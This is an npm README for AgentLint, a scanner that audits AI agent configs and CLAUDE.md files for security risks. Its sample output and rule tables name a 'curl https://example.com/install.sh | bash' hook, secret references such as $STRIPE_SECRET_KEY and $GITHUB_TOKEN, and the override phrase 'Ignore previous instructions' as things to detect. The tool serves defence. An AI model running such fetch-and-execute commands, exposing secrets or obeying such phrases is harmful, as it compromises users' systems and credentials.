Package Exports
- agentlint
- agentlint/dist/index.js
This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (agentlint) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.
Readme
AgentLint
Supply-chain security for AI agent configurations
AgentLint helps developers and security teams audit AI agent configurations before they execute—catching curl | bash, secret leaks, and privilege escalation in Claude Code, Cursor, and CLAUDE.md files.
Why AgentLint?
AI coding agents are powerful—but their configuration files are a new attack surface:
- Skills can run shell commands → supply-chain risk
- Hooks execute automatically → no user approval
- Configs reference secrets → credential exposure
- Anyone can share skills → no vetting process
AgentLint treats agent configs like code: scan, diff, and gate them in CI.
Quick Start
# Install
npm install -g agentlint
# Scan your project
agentlint scanExpected output (clean project):
AgentLint scan: .
Parsed: 2 documents (claude=2)
No findings detected.
Status: PASSExpected output (risky config):
AgentLint scan: .
Parsed: 4 documents (claude=3, cursor=1)
Context: hooks detected
Findings:
HIGH EXEC-001 Dynamic Shell Execution
.claude/hooks/post_edit.sh:5
Evidence: "curl https://example.com/install.sh | bash"
HIGH SEC-001 Environment Secret Reference
CLAUDE.md:14
Reference to secret: $STRIPE_SECRET_KEY
Status: FAIL (2 high)How It Works
┌─────────────────┐ ┌──────────────┐ ┌─────────────┐
│ .claude/ │ │ │ │ │
│ .cursorrules │────▶│ AgentLint │────▶│ Findings │
│ CLAUDE.md │ │ │ │ │
└─────────────────┘ └──────────────┘ └─────────────┘
│ │ │
▼ ▼ ▼
Parse to IR Apply 20 Rules Text/JSON/SARIF- Parse agent configs into a normalized internal representation
- Analyze with 20 security rules across 8 categories
- Report findings with evidence and remediation guidance
- Gate in CI with configurable severity thresholds
Examples
Try AgentLint on our example configs:
# Clean config (passes)
agentlint scan examples/minimal
# Risky config (fails with findings)
agentlint scan examples/realisticSee examples/ for full details.
What It Detects
| Category | Rules | What It Catches |
|---|---|---|
| Execution | EXEC-001, 002, 003 | curl | bash, eval, hooks running commands |
| Filesystem | FS-001, 002, 003 | Unscoped writes, .git/ access, sensitive paths |
| Network | NET-001, 002, 003 | Undeclared network, remote script fetches |
| Secrets | SEC-001, 002, 003 | $GITHUB_TOKEN, .env access, secret propagation |
| Hooks | HOOK-001, 002 | Auto-triggered side effects, hidden hooks |
| Instructions | INST-001, 002 | "Ignore previous instructions", self-modification |
| Scope | SCOPE-001, 002 | Capability expansion, write scope widening |
| Observability | OBS-001, 002 | Missing declarations, no permission manifest |
Run agentlint rules list to see all rules, or agentlint rules explain EXEC-001 for details.
CI/CD Integration
GitHub Actions
name: AgentLint
on:
pull_request:
paths: [".claude/**", ".cursorrules", "CLAUDE.md", "AGENTS.md"]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm install -g agentlint
- run: agentlint scan --ci --format sarif --output agentlint.sarif
- uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: agentlint.sarifFindings appear as code annotations in PRs via GitHub Code Scanning.
Exit Codes
| Code | Meaning |
|---|---|
| 0 | Pass |
| 1 | Findings at/above threshold |
| 2 | CLI usage error |
| 3 | Config error |
| 4 | Parse error |
| 5 | Internal error |
Configuration
Create agentlint.yaml to customize behavior:
version: 1
policy:
fail_on: high # Fail CI on high severity
warn_on: medium # Warn on medium severity
rules:
disable: [OBS-002] # Disable specific rules
capabilities:
fail_on_new_dynamic_shell: true
fail_on_sensitive_path_write: trueGenerate a starter config:
agentlint init
agentlint init --ci github # Include GitHub Actions workflowAuto-Fix
Automatically fix simple issues:
# Preview fixes without applying
agentlint scan --dry-run --fix
# Apply fixes
agentlint scan --fixCurrently fixable rules:
OBS-002: Adds permission manifest comment
Baseline
Suppress known findings to focus on new issues:
# Create/update baseline with current findings
agentlint scan --update-baseline
# Scan respects baseline automatically
agentlint scan
# Output: "Baseline: 15 known finding(s) suppressed"
# Ignore baseline to see all findings
agentlint scan --ignore-baseline
# Remove fixed findings from baseline
agentlint scan --prune-baseline
# Use custom baseline path
agentlint scan --baseline path/to/baseline.jsonDiff Mode
Detect behavioral changes between versions:
agentlint diff ./before ./afterAgentLint diff: ./before → ./after
Behavioral changes:
HIGH capability_expansion
shell_exec: false → true
HIGH network_new_outbound
network.outbound: false → true
Status: FAIL (capability expansion detected)Comparison with Alternatives
| AgentLint | Manual Review | No Scanning | |
|---|---|---|---|
Detects curl | bash |
Automatic | Maybe | No |
| CI integration | Native SARIF | Manual | N/A |
| Diff detection | Semantic | Text diff | None |
| Time to review | Seconds | Minutes–Hours | N/A |
AgentLint is purpose-built for AI agent configs. General linters miss agent-specific risks.
Integrations
| Tool | Link |
|---|---|
| VS Code | agentlint-vscode |
| GitHub Action | agentlint-action |
| Pre-commit | docs/pre-commit.md |
Roadmap
- Claude Code support (
.claude/,CLAUDE.md) - Cursor support (
.cursorrules) - 20 security rules
- SARIF output for GitHub
- Diff mode
- VS Code extension
- GitHub Action (native)
- Pre-commit hook
- Auto-fix for common issues
- Baseline support for suppressing known findings
- Policy-as-code engine
- Signed skill packs
- Agent config registry
Documentation
Contributing
We welcome contributions! See CONTRIBUTING.md for:
- Development setup
- Adding new rules
- Coding standards
- PR process
License
Apache 2.0 — see LICENSE
Built to secure the AI agent ecosystem